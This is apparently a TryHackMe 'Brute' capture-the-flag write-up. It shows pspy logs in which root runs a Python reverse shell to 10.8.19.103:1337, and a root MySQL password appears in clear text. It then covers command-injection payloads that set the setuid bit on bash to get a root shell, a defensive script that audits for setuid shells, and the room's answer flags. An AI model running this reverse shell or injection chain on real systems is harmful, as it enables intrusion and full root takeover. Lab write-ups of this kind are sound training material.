2023/01/13 18:49:03 CMD: UID=0 PID=4 |
2023/01/13 18:49:03 CMD: UID=0 PID=373 | /lib/systemd/systemd-udevd
2023/01/13 18:49:03 CMD: UID=0 PID=344 | /lib/systemd/systemd-journald
2023/01/13 18:49:03 CMD: UID=0 PID=3 |
2023/01/13 18:49:03 CMD: UID=0 PID=273 |
2023/01/13 18:49:03 CMD: UID=0 PID=272 |
2023/01/13 18:49:03 CMD: UID=0 PID=24 |
2023/01/13 18:49:03 CMD: UID=0 PID=23 |
2023/01/13 18:49:03 CMD: UID=0 PID=225 |
2023/01/13 18:49:03 CMD: UID=0 PID=22 |
2023/01/13 18:49:03 CMD: UID=0 PID=21 |
2023/01/13 18:49:03 CMD: UID=0 PID=20 |
2023/01/13 18:49:03 CMD: UID=0 PID=2 |
2023/01/13 18:49:03 CMD: UID=0 PID=199 |
2023/01/13 18:49:03 CMD: UID=0 PID=19 |
2023/01/13 18:49:03 CMD: UID=0 PID=18129 | /lib/systemd/systemd-udevd
2023/01/13 18:49:03 CMD: UID=0 PID=18128 | /lib/systemd/systemd-udevd
2023/01/13 18:49:03 CMD: UID=0 PID=18127 | /lib/systemd/systemd-udevd
2023/01/13 18:49:03 CMD: UID=1000 PID=18120 | ./pspy64s
2023/01/13 18:49:03 CMD: UID=0 PID=18 |
2023/01/13 18:49:03 CMD: UID=0 PID=17559 | bash
2023/01/13 18:49:03 CMD: UID=0 PID=17557 | python3 -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.19.103",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")
2023/01/13 18:49:03 CMD: UID=0 PID=17556 | /usr/bin/sh -c echo `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.19.103",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'`
2023/01/13 18:49:03 CMD: UID=0 PID=17386 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:49:03 CMD: UID=0 PID=17384 | /bin/sh -c /usr/bin/bash /root/check_in.sh
2023/01/13 18:49:03 CMD: UID=0 PID=17381 | /usr/sbin/CRON -f
2023/01/13 18:49:03 CMD: UID=0 PID=17 |
2023/01/13 18:49:03 CMD: UID=0 PID=16842 |
2023/01/13 18:49:03 CMD: UID=0 PID=16442 |
2023/01/13 18:49:03 CMD: UID=0 PID=16 |
2023/01/13 18:49:03 CMD: UID=33 PID=1578 | /usr/sbin/apache2 -k start
2023/01/13 18:49:03 CMD: UID=0 PID=156 |
2023/01/13 18:49:03 CMD: UID=0 PID=15 |
2023/01/13 18:49:03 CMD: UID=0 PID=14 |
2023/01/13 18:49:03 CMD: UID=1000 PID=13188 | -bash
2023/01/13 18:49:03 CMD: UID=1000 PID=13187 | sshd: adrian@pts/1
2023/01/13 18:49:03 CMD: UID=1000 PID=13109 | (sd-pam)
2023/01/13 18:49:03 CMD: UID=0 PID=13103 |
2023/01/13 18:49:03 CMD: UID=1000 PID=13102 | /lib/systemd/systemd --user
2023/01/13 18:49:03 CMD: UID=0 PID=13094 | sshd: adrian [priv]
2023/01/13 18:49:03 CMD: UID=0 PID=13 |
2023/01/13 18:49:03 CMD: UID=0 PID=121 |
2023/01/13 18:49:03 CMD: UID=0 PID=12 |
2023/01/13 18:49:03 CMD: UID=0 PID=11 |
2023/01/13 18:49:03 CMD: UID=0 PID=108 |
2023/01/13 18:49:03 CMD: UID=0 PID=105 |
2023/01/13 18:49:03 CMD: UID=0 PID=104 |
2023/01/13 18:49:03 CMD: UID=0 PID=10 |
2023/01/13 18:49:03 CMD: UID=0 PID=1 | /sbin/init maybe-ubiquity
2023/01/13 18:50:01 CMD: UID=0 PID=18317 | /usr/sbin/CRON -f
2023/01/13 18:50:01 CMD: UID=0 PID=18316 | /usr/sbin/CRON -f
2023/01/13 18:50:01 CMD: UID=0 PID=18315 | /usr/sbin/CRON -f
2023/01/13 18:50:01 CMD: UID=0 PID=18319 | /usr/sbin/CRON -f
2023/01/13 18:50:01 CMD: UID=0 PID=18318 | /usr/sbin/CRON -f
2023/01/13 18:50:01 CMD: UID=1000 PID=18320 | /usr/bin/bash /home/adrian/punch_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18322 | /bin/sh -c /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=1000 PID=18321 |
2023/01/13 18:50:01 CMD: UID=0 PID=18323 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18326 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18325 | /usr/sbin/CRON -f
2023/01/13 18:50:01 CMD: UID=1000 PID=18324 | /usr/bin/bash /home/adrian/punch_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18327 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18328 | /bin/sh -c /usr/bin/mysql -h localhost -u root -p'SuperSqlP@ss3' -e 'flush hosts;'
2023/01/13 18:50:01 CMD: UID=0 PID=18329 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18330 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18331 |
2023/01/13 18:50:01 CMD: UID=0 PID=18334 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18335 | /usr/bin/sh -c echo Punched in at 16:13
2023/01/13 18:50:01 CMD: UID=0 PID=18336 |
2023/01/13 18:50:01 CMD: UID=0 PID=18338 |
2023/01/13 18:50:01 CMD: UID=0 PID=18346 |
2023/01/13 18:50:01 CMD: UID=0 PID=18348 |
2023/01/13 18:50:01 CMD: UID=0 PID=18350 |
2023/01/13 18:50:01 CMD: UID=0 PID=18352 |
2023/01/13 18:50:01 CMD: UID=0 PID=18356 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18358 |
2023/01/13 18:50:01 CMD: UID=0 PID=18360 | /usr/bin/sh -c echo Punched in at 16:38
2023/01/13 18:50:01 CMD: UID=0 PID=18361 |
2023/01/13 18:50:01 CMD: UID=0 PID=18363 |
2023/01/13 18:50:01 CMD: UID=0 PID=18364 |
2023/01/13 18:50:01 CMD: UID=0 PID=18366 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18367 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18368 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18369 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18370 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18371 |
2023/01/13 18:50:01 CMD: UID=0 PID=18372 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18373 |
2023/01/13 18:50:01 CMD: UID=0 PID=18375 |
2023/01/13 18:50:01 CMD: UID=0 PID=18377 |
2023/01/13 18:50:01 CMD: UID=0 PID=18379 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18380 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18381 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18382 |
2023/01/13 18:50:01 CMD: UID=0 PID=18383 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18384 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18385 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18388 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18391 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18392 |
2023/01/13 18:50:01 CMD: UID=0 PID=18393 |
2023/01/13 18:50:01 CMD: UID=0 PID=18394 |
2023/01/13 18:50:01 CMD: UID=0 PID=18396 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18397 |
2023/01/13 18:50:01 CMD: UID=0 PID=18399 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18400 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18401 |
2023/01/13 18:50:01 CMD: UID=0 PID=18402 |
2023/01/13 18:50:01 CMD: UID=0 PID=18403 |
2023/01/13 18:50:01 CMD: UID=0 PID=18405 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18406 | /usr/bin/sh -c echo Punched in at 17:24
2023/01/13 18:50:01 CMD: UID=0 PID=18407 |
2023/01/13 18:50:01 CMD: UID=0 PID=18408 |
2023/01/13 18:50:01 CMD: UID=0 PID=18409 | /usr/bin/sh -c echo Punched in at 17:27
2023/01/13 18:50:01 CMD: UID=0 PID=18411 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18412 |
2023/01/13 18:50:01 CMD: UID=0 PID=18413 |
2023/01/13 18:50:01 CMD: UID=0 PID=18415 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18416 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18417 |
2023/01/13 18:50:01 CMD: UID=0 PID=18418 |
2023/01/13 18:50:01 CMD: UID=0 PID=18419 |
2023/01/13 18:50:01 CMD: UID=0 PID=18421 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18422 |
2023/01/13 18:50:01 CMD: UID=0 PID=18424 |
2023/01/13 18:50:01 CMD: UID=0 PID=18428 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18429 |
2023/01/13 18:50:01 CMD: UID=0 PID=18430 |
2023/01/13 18:50:01 CMD: UID=0 PID=18432 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18433 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18434 |
2023/01/13 18:50:01 CMD: UID=0 PID=18435 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18436 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18437 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18439 |
2023/01/13 18:50:01 CMD: UID=0 PID=18441 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18442 |
2023/01/13 18:50:01 CMD: UID=0 PID=18443 |
2023/01/13 18:50:01 CMD: UID=0 PID=18444 |
2023/01/13 18:50:01 CMD: UID=0 PID=18445 |
2023/01/13 18:50:01 CMD: UID=0 PID=18446 |
2023/01/13 18:50:01 CMD: UID=0 PID=18447 |
2023/01/13 18:50:01 CMD: UID=0 PID=18449 |
2023/01/13 18:50:01 CMD: UID=0 PID=18450 |
2023/01/13 18:50:01 CMD: UID=0 PID=18451 |
2023/01/13 18:50:01 CMD: UID=0 PID=18453 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18454 |
2023/01/13 18:50:01 CMD: UID=0 PID=18456 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18458 |
2023/01/13 18:50:01 CMD: UID=0 PID=18459 |
2023/01/13 18:50:01 CMD: UID=0 PID=18461 |
2023/01/13 18:50:01 CMD: UID=0 PID=18465 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18466 | /usr/bin/sh -c echo Punched in at 18:24
2023/01/13 18:50:01 CMD: UID=0 PID=18467 |
2023/01/13 18:50:01 CMD: UID=0 PID=18469 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18470 |
2023/01/13 18:50:01 CMD: UID=0 PID=18471 |
2023/01/13 18:50:01 CMD: UID=0 PID=18473 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18474 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18475 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18477 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18478 |
2023/01/13 18:50:01 CMD: UID=0 PID=18479 |
2023/01/13 18:50:01 CMD: UID=0 PID=18481 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18482 | /usr/bin/sh -c echo Punched in at 18:37
2023/01/13 18:50:01 CMD: UID=0 PID=18483 |
2023/01/13 18:50:01 CMD: UID=0 PID=18484 |
2023/01/13 18:50:01 CMD: UID=0 PID=18485 | /usr/bin/sh -c echo Punched in at 18:40
2023/01/13 18:50:01 CMD: UID=0 PID=18487 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:01 CMD: UID=0 PID=18488 | /usr/bin/sh -c echo Punched in at 18:42
2023/01/13 18:50:01 CMD: UID=0 PID=18489 |
2023/01/13 18:50:01 CMD: UID=0 PID=18490 |
2023/01/13 18:50:01 CMD: UID=0 PID=18492 | /usr/bin/sh -c echo `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.19.103",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'`
2023/01/13 18:50:01 CMD: UID=0 PID=18491 | /usr/bin/sh -c echo `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.19.103",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'`
2023/01/13 18:50:02 CMD: UID=0 PID=18493 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:02 CMD: UID=0 PID=18496 |
2023/01/13 18:50:02 CMD: UID=0 PID=18498 | /usr/bin/bash /root/check_in.sh
2023/01/13 18:50:02 CMD: UID=0 PID=18499 |
$(chmod u+s /usr/bin/bash)
or
`chmod +s /usr/bin/bash`
The commands `chmod u+s /usr/bin/bash` and `chmod +s /usr/bin/bash` are very similar in effect: both make /usr/bin/bash a set-user-ID program, meaning that when the file is executed it runs with the effective user ID of the file's owner (here root) rather than that of the user executing it, which is why `/usr/bin/bash -p` below gives a root shell.
The difference is the letter 'u' in the first command: `u+s` sets only the set-user-ID bit (the 4000 bit), while `+s` with no user class given sets both the set-user-ID and the set-group-ID bits (4000 and 2000), so the binary also runs with the effective group ID of the file's group.
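To see the difference in the mode bits, and to check a filesystem for the kind of setuid shell this leaves behind, here is an added example (not from the writeup) that applies both chmod forms to constructed temporary files and then audits a directory for set-user-ID/set-group-ID files. It assumes GNU coreutils (`stat -c %a`) on Linux; the shell names it flags are a demo list, not an exhaustive one.

```shell
#!/bin/sh
# Added example, not from the writeup. Shows what `chmod u+s` and `chmod +s`
# actually set, and a small audit for setuid/setgid files that would catch a
# bash binary left in this state. Uses GNU `stat -c %a` (Linux).

# Octal mode of a path, e.g. 644, 4644 (setuid), 6644 (setuid+setgid).
octal_mode() {
    stat -c %a "$1"
}

# Applies the given chmod mode string to a fresh 0644 file and returns the
# resulting octal mode. The temp file is constructed and removed here.
mode_after_chmod() {
    f=$(mktemp)
    chmod 644 "$f"
    chmod "$1" "$f"
    m=$(octal_mode "$f")
    rm -f "$f"
    printf '%s' "$m"
}

# Lists regular files under a directory that carry the setuid (04000) or
# setgid (02000) bit, one path per line, sorted for stable output.
find_setid_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) | sort
}

# Name check against common shell binaries (demo list, an assumption):
# a set-id file with one of these names deserves an immediate look.
is_setid_shell() {
    case "$(basename "$1")" in
        bash|sh|dash|zsh|ksh) return 0 ;;
    esac
    return 1
}

demo() {
    echo "u+s on a 0644 file -> $(mode_after_chmod u+s)"   # 4644: setuid only
    echo "+s  on a 0644 file -> $(mode_after_chmod +s)"    # 6644: setuid + setgid

    d=$(mktemp -d)
    : > "$d/bash"       # constructed stand-in for /usr/bin/bash
    : > "$d/notes.txt"  # ordinary file, must not be reported
    chmod 755 "$d/bash" && chmod +s "$d/bash"
    echo "--- setuid/setgid files under $d ---"
    find_setid_files "$d" | while IFS= read -r p; do
        if is_setid_shell "$p"; then
            echo "$p  <-- shell with set-id bits"
        else
            echo "$p"
        fi
    done
    rm -rf "$d"
}

demo
```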
adrian@brute:~$ echo '`chmod +s /usr/bin/bash`' > punch_in
adrian@brute:~$ /usr/bin/bash -p
bash-5.0# whoami
root
adrian@brute:~$ echo '$(chmod u+s /usr/bin/bash)' > punch_in
adrian@brute:~$ /usr/bin/bash -p
bash-5.0# whoami
root
What is the user flag?
THM{PoI$0n_tH@t_L0g}
What is the root flag?
THM{C0mm@nD_Inj3cT1on_4_D@_BruT3}